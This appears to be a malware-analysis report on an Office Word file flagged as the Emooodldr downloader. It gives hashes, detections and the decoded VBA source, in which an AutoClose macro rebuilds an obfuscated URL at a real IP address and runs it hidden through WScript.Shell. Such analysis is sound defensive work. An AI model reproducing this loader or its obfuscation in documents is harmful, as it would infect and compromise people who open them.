Emooodldr — Office (OOXML) malware analysis

Static analysis result for SHA-256 d156e14065b5293a…

MALICIOUS

Office (OOXML)

54.1 KB Created: 2017-11-29 23:43:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2019-03-18
MD5: acdb52ba10e89aec5fe717f428636875 SHA-1: df4bec2c8db28c8d5a9892c9b716825bb82ce467 SHA-256: d156e14065b5293a5511a027e6943399b3450a6b3ff74c50e31b3b7f4a1153f1
322 Risk Score

Malware Insights

Emooodldr · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains heavily obfuscated VBA macros, including an Auto_Close macro, which is a common loader technique. The script attempts to download and execute a payload from the reconstructed URL 'http://198.55.107.156/o/a.php?uk=a.php' using WScript.Shell. ClamAV detection further confirms its malicious nature, identifying it as Doc.Malware.Emooodldr.

Heuristics 7

  • ClamAV: Doc.Malware.Emooodldr-6711604-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emooodldr-6711604-0
  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2543 bytes
SHA-256: f290efbc56b555a7db591e411cf4821f61765270077273e4ad923c88ed220189
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub fominha()
 BvizgwnFJEVL = 1025 - 1590 - 1635 - 526 - 1819 - 756 - 1765
yRpJONvq = Trim("p") & Trim("I") & "k"
WVLgBwJxEDk = 370 + 238 + 70
fkWiuqnMVjSz = 1215 + 673 + 137 + 1819 + 1867
oiVKZIzPndn = "N" & Trim("S") & "R"

 cogumelo = "MwYvLMGnrDcdQPiIViiTwjEOhkruKnSxHEFyVVnAHriGfXVrQ hkruKnSxHEFyVkruKnSxHEFyVp://198.55.107.156/oMwYvLMGnrDcdMwYvLMGnrDcd/QPiIViiTwjEOkruKnSxHEFyVCBGKocwOuACWMwYvLMGnrDcd.php?ukruKnSxHEFyVMwYvLMGnrDcdVnAHriGfXVrQ=hondVnAHriGfXVrQ"
cogumelo = Replace(cogumelo, "MwYvLMGnrDcd", "m")
cogumelo = Replace(cogumelo, "VnAHriGfXVrQ", "a")
uPrnHBVNN = 1146 + 1067
cogumelo = Replace(cogumelo, "QPiIViiTwjEO", "s")
GfXuZGUWW = "w" & Trim("A")
pEfYMkCVMDBK = 1029 + 1651 + 643 + 1997 + 894 + 1199 + 969
cogumelo = Replace(cogumelo, "kruKnSxHEFyV", "t")
cogumelo = Replace(cogumelo, "CBGKocwOuACW", "e")
UHYdwIq = "d" & Trim("K") & Trim("Y")
iBAnroMgq = "Z" & "Q" & Trim("M")
cogumelo = Replace(cogumelo, "KySNYTJRAjKR", "l")

nirvana = "WScripLWrCpPbBzLwQ.ShXxIJQcGcbPYJRFyVPXiMOxOoRFyVPXiMOxOo"
nirvana = Replace(nirvana, "iJbwOEbXXDUY", "m")
nirvana = Replace(nirvana, "DuQkRQgnNogf", "a")
GFdjonOvvN = 1229 + 1997 + 767 + 1345
wdkWwVMogMdF = Trim("C") & Trim("o") & Trim("d")
WDuCSTJ = 519 - 1951 - 448 - 315 - 1544 - 1316 - 1496
nirvana = Replace(nirvana, "VfnwvorYrOGq", "s")
nirvana = Replace(nirvana, "LWrCpPbBzLwQ", "t")
nirvana = Replace(nirvana, "XxIJQcGcbPYJ", "e")
XooBBDiuw = "f" & "H" & Trim("D") & "A"
nirvana = Replace(nirvana, "RFyVPXiMOxOo", "l")
yBjcuoUUR = "i" & "c" & "q" & "M" & "i"
YFnIKVUDWo = 1743 + 996 + 1927 + 622 + 106 + 1839


 CreateObject(nirvana).Run cogumelo, 0
 YWBYKNnG = 1482 + 1928
iScvAfJ = "S" & "M" & "V"
iJWIpyRIvEo = 1085 + 821 + 1310 + 357
poSXLkHfzF = 1956 - 1587 - 1002 - 1256
UivKyIW = 1591 + 174 + 366 + 940 + 1106

End Sub

Sub AutoClose()

  Xwzcvbkqgd = 1905 + 604 + 1197 + 113 + 469 + 1571 + 409
UArEdXocXAp = 1210 - 359
gRINSrwkzQH = Trim("R") & "T" & Trim("N") & Trim("i")
ZQQNViIRP = 1605 - 387 - 894 - 88
YiYrBorUWXo = 40 - 1342 - 1003 - 1795 - 930

  Application.Run "fominha"
  gAJMQHJn = 1568 + 1554 + 1690 + 1220
DQXDnWzd = 521 + 394 + 1937
PJqGHnKyW = "W" & "Z"
GxCxAKVQO = Trim("A") & Trim("Y")

End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 12800 bytes
SHA-256: a15c453d2e422cd837a18ea051e457b3cd58e6808d0dcfebc78def3ae71c547d
Detection
ClamAV: Doc.Malware.Emooodldr-6711604-0
Obfuscation or payload: unlikely